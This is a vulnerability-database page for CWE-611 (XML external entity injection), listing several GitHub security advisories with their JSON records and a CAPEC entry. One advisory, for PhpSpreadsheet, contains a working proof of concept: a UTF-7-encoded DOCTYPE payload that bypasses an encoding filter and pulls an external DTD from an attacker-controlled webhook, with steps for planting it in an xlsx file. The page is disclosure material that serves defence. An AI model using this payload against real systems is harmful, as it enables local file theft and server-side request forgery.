CWE-611
AllowedImproper Restriction of XML External Entity Reference
Abstraction: Base · Status: Draft
The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
1694 vulnerabilities reference this CWE, most recent first.
GHSA-GG63-HGM5-V538
Vulnerability from github – Published: 2024-02-03 03:30 – Updated: 2025-11-04 00:30IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 254783.
{
"affected": [],
"aliases": [
"CVE-2023-32327"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-03T01:15:08Z",
"severity": "HIGH"
},
"details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 254783.",
"id": "GHSA-gg63-hgm5-v538",
"modified": "2025-11-04T00:30:45Z",
"published": "2024-02-03T03:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32327"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254783"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7106586"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Nov/0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-GG84-HM7C-X3XQ
Vulnerability from github – Published: 2022-05-14 01:36 – Updated: 2022-05-14 01:36Anyplace version before commit 80359b4 contains a XML External Entity (XXE) vulnerability in Man in the middle on map API call that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This vulnerability appears to have been fixed in after commit 80359b4.
{
"affected": [],
"aliases": [
"CVE-2018-1000829"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-12-20T15:29:00Z",
"severity": "CRITICAL"
},
"details": "Anyplace version before commit 80359b4 contains a XML External Entity (XXE) vulnerability in Man in the middle on map API call that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This vulnerability appears to have been fixed in after commit 80359b4.",
"id": "GHSA-gg84-hm7c-x3xq",
"modified": "2022-05-14T01:36:12Z",
"published": "2022-05-14T01:36:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000829"
},
{
"type": "WEB",
"url": "https://github.com/dmsl/anyplace/issues/263"
},
{
"type": "WEB",
"url": "https://0dd.zone/2018/10/28/anyplace-XXE-MitM"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GGPQ-CPRG-V67R
Vulnerability from github – Published: 2022-12-06 18:30 – Updated: 2022-12-08 18:30An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.
{
"affected": [],
"aliases": [
"CVE-2022-45326"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-12-06T17:15:00Z",
"severity": "MODERATE"
},
"details": "An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.",
"id": "GHSA-ggpq-cprg-v67r",
"modified": "2022-12-08T18:30:49Z",
"published": "2022-12-06T18:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45326"
},
{
"type": "WEB",
"url": "https://www.navsec.net/2022/11/12/kwoksys-xxe.html"
},
{
"type": "WEB",
"url": "http://www.kwoksys.com/wiki/index.php?title=Release_Notes"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-GHG6-32F9-2JP7
Vulnerability from github – Published: 2024-08-29 17:58 – Updated: 2025-03-06 18:10Summary
Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)
Details
Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this:
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>
If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.
PoC
1) Create simple xlsx file
2) Rename xlsx to zip
3) Go to the zip and open the xl/sharedStrings.xml file in edit mode.
4) Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>
5) Save sharedStrings.xml file and rename zip back to xlsx.
6) Use minimal php code that simply opens this xlsx file:
use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
7) You will receive the request to your http://%webhook%/file.dtd
8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.
Impact
Read local files
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.29.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpexcel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.8.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45048"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-29T17:58:27Z",
"nvd_published_at": "2024-08-28T21:15:06Z",
"severity": "HIGH"
},
"details": "### Summary\nBypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) \n\n### Details\nCheck ` $pattern = \u0027/encoding=\"(.*?)\"/\u0027;` easy to bypass. Just use a single quote symbol `\u0027`. So payload looks like this:\n```\n\u003c?xml version=\"1.0\" encoding=\u0027UTF-7\u0027 standalone=\"yes\"?\u003e\n+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://example.com/file.dtd\"\u003e %xxe;]\u003e\n```\nIf you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. \n\n### PoC\n1) Create simple xlsx file\n2) Rename xlsx to zip\n3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode.\n4) Replace `\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e` to \n```\n\u003c?xml version=\"1.0\" encoding=\u0027UTF-7\u0027 standalone=\"yes\"?\u003e\n+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://%webhook%/file.dtd\"\u003e %xxe;]\u003e\n```\n5) Save `sharedStrings.xml` file and rename zip back to xlsx.\n6) Use minimal php code that simply opens this xlsx file:\n```\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n$spreadsheet = IOFactory::load(\"file.xlsx\");\n```\n7) You will receive the request to your `http://%webhook%/file.dtd`\n8) Dont\u0027t forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.\n\n### Impact\nRead local files\n",
"id": "GHSA-ghg6-32f9-2jp7",
"modified": "2025-03-06T18:10:41Z",
"published": "2024-08-29T17:58:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45048"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/PhpSpreadsheet"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "XXE in PHPSpreadsheet encoding is returned"
}
GHSA-GHJW-FCF6-RPR9
Vulnerability from github – Published: 2023-09-06 15:30 – Updated: 2024-01-09 20:58Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c 1229.v3039470161a"
},
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:jobConfigHistory"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1229.v3039470161a_d"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-41933"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-09T20:58:13Z",
"nvd_published_at": "2023-09-06T13:15:10Z",
"severity": "HIGH"
},
"details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.",
"id": "GHSA-ghjw-fcf6-rpr9",
"modified": "2024-01-09T20:58:13Z",
"published": "2023-09-06T15:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41933"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/job-config-history-plugin/commit/3039470161ada86f4091c75fc779ebfdb69f3210"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/job-config-history-plugin"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3235"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Job Configuration History Plugin\u0027s path traversal allows exploiting XXE vulnerability"
}
GHSA-GHWC-HRR9-VJ2W
Vulnerability from github – Published: 2025-12-24 21:30 – Updated: 2025-12-24 21:30NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 contains an unauthenticated XML External Entity (XXE) injection vulnerability in XML preference import settings. Attackers can craft malicious XML files with DTD parameter entities to retrieve arbitrary system files through an out-of-band channel attack.
{
"affected": [],
"aliases": [
"CVE-2018-25142"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-24T20:15:48Z",
"severity": "HIGH"
},
"details": "NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 contains an unauthenticated XML External Entity (XXE) injection vulnerability in XML preference import settings. Attackers can craft malicious XML files with DTD parameter entities to retrieve arbitrary system files through an out-of-band channel attack.",
"id": "GHSA-ghwc-hrr9-vj2w",
"modified": "2025-12-24T21:30:31Z",
"published": "2025-12-24T21:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25142"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/45337"
},
{
"type": "WEB",
"url": "https://www.novarad.net"
},
{
"type": "WEB",
"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5488.php"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-GJG3-8MX2-7F8F
Vulnerability from github – Published: 2023-07-06 19:24 – Updated: 2025-02-06 18:30cgi-bin/xmlstatus.cgi in Güralp MAN-EAM-0003 3.2.4 is vulnerable to an XML External Entity (XXE) issue via XML file upload, which leads to local file disclosure.
{
"affected": [],
"aliases": [
"CVE-2022-38840"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-16T02:15:00Z",
"severity": "HIGH"
},
"details": "cgi-bin/xmlstatus.cgi in G\u00fcralp MAN-EAM-0003 3.2.4 is vulnerable to an XML External Entity (XXE) issue via XML file upload, which leads to local file disclosure.",
"id": "GHSA-gjg3-8mx2-7f8f",
"modified": "2025-02-06T18:30:59Z",
"published": "2023-07-06T19:24:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38840"
},
{
"type": "WEB",
"url": "https://drive.google.com/drive/folders/1UG5IcL8fFp9MV0vjd78_cx6iXKda5bpM?usp=sharing"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/171439/MAN-EAM-0003-3.2.4-XML-Injection.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-GJRQ-R2PC-24VF
Vulnerability from github – Published: 2022-05-24 19:16 – Updated: 2022-05-24 19:16A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information or conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information, or cause the web application to perform arbitrary HTTP requests on behalf of the attacker.
{
"affected": [],
"aliases": [
"CVE-2021-34706"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-10-06T20:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information or conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information, or cause the web application to perform arbitrary HTTP requests on behalf of the attacker.",
"id": "GHSA-gjrq-r2pc-24vf",
"modified": "2022-05-24T19:16:40Z",
"published": "2022-05-24T19:16:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34706"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-xxe-inj-V4VSjEsX"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GM25-RHMW-47GF
Vulnerability from github – Published: 2022-07-20 00:00 – Updated: 2022-07-28 00:00IBM Sterling Partner Engagement Manager 6.1.2, 6.2, and Cloud/SasS 22.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 220651.
{
"affected": [],
"aliases": [
"CVE-2022-22358"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-19T17:15:00Z",
"severity": "HIGH"
},
"details": "IBM Sterling Partner Engagement Manager 6.1.2, 6.2, and Cloud/SasS 22.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 220651.",
"id": "GHSA-gm25-rhmw-47gf",
"modified": "2022-07-28T00:00:54Z",
"published": "2022-07-20T00:00:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22358"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/220651"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/6604993"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-GM54-MW9W-8CV2
Vulnerability from github – Published: 2021-12-02 00:00 – Updated: 2021-12-04 00:01CloverDX Server before 5.11.2 and and 5.12.x before 5.12.1 allows XXE during configuration import.
{
"affected": [],
"aliases": [
"CVE-2021-42776"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-01T17:15:00Z",
"severity": "HIGH"
},
"details": "CloverDX Server before 5.11.2 and and 5.12.x before 5.12.1 allows XXE during configuration import.",
"id": "GHSA-gm54-mw9w-8cv2",
"modified": "2021-12-04T00:01:26Z",
"published": "2021-12-02T00:00:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42776"
},
{
"type": "WEB",
"url": "https://support.cloverdx.com/releases"
},
{
"type": "WEB",
"url": "https://support1.cloverdx.com/hc/en-us/articles/4411125429010"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation
Many XML parsers and validators can be configured to disable external entity expansion.
CAPEC-221: Data Serialization External Entities Blowup
This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.